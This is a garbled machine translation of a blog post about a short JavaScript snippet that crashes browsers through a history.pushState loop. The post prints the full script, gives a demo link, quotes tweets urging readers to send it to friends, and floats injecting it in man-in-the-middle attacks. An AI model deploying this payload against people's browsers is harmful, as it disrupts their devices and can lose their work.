Late-night topic: How did these twelve lines of code make the browser explode? |

Late-night topic: How did these twelve lines of code make the browser explode? |

 

 

Cause

Today, we found Cyber Security@ Cyber _ secThe Tweets let people shine:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. # dos # 0day # exploit // use the following JavaScript code to crash firefox, chrome, and safari, and restart the iphone.

 

Continue to dig deep into IT Security Tweets on Twitter? @ F1r3h4nd:

Crash your friend's browser and restart Iphone with a link which has this script: # 0day // send a link with the following script to your friends, which can Crash your friend's browser, and restart the Iphone.

 

The complete HTML code is as follows:

<Script> var total = ""; for (var I = 0; I <1000000; I ++) {total = total + I. toString (); history. pushState (0, 0, total) ;}</script>

Demo :( tip: Save the editing tasks in other windows of the browser)

Www.0xroot.cn/demo.html (click it and you will not be pregnant again !)

What will happen next?

After clicking open, my status is as follows:

 

 

If you are a PC-end user, after clicking the link, the computer's CPU memory is very likely to go crazy until the browser crashes!

If you are a mobile client (Android or iPhone) user, your browser will crash after clicking the link! Clicking a link on Weibo or the client will also crash. As for the restart of the iPhone mentioned in the tweets, this phenomenon does not appear.Fixed at: After the link was opened on iPhone Safari, the phone was canceled and restarted !...

Thoughts

Is this a Bug or 0 day? Why does this happen? How to implement it?

Which of the following are interesting scenarios? (Let me start with: When an MITM man-in-the-middle attack is executed, this section of js can be injected to spoof the hacker. And I understand it all ...)

You are welcome to express your views in the comments.

 

Weibo comment/discussion Extraction

Pregnant... interesting... terrible... I am already suffering from a lot of attacks) ten seconds after Firefox crashes, a pop-up window prompts that the script has no response and can be stopped. Is it history stack overflow? Yes. get √ JS is the best language in the world! Why is hist. pushState used? The computer is restarting. Why can't I just hire me? There is no problem with Chrome stealth mode.